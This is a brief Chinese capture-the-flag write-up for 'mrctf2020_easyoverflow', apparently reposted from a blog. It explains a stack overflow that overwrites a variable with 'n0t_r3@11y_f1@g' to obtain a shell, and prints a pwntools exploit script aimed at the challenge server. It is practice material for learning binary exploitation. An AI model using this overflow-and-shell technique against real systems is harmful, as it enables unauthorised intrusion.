mrctf2020_easyoverflow
作者:互联网
mrctf2020_easyoverflow
查看保护
有个溢出,可以覆盖掉v5。v5等于n0t_r3@11y_f1@g即可get_shell。所以溢出改v5就行。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 26447)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
p1 = b'a' * 0x30 + b'n0t_r3@11y_f1@g'
r.sendline(p1)
r.interactive()
标签:f1,name,easyoverflow,v5,file,debug,n0t,mrctf2020 来源: https://blog.csdn.net/zzq487782568/article/details/121895303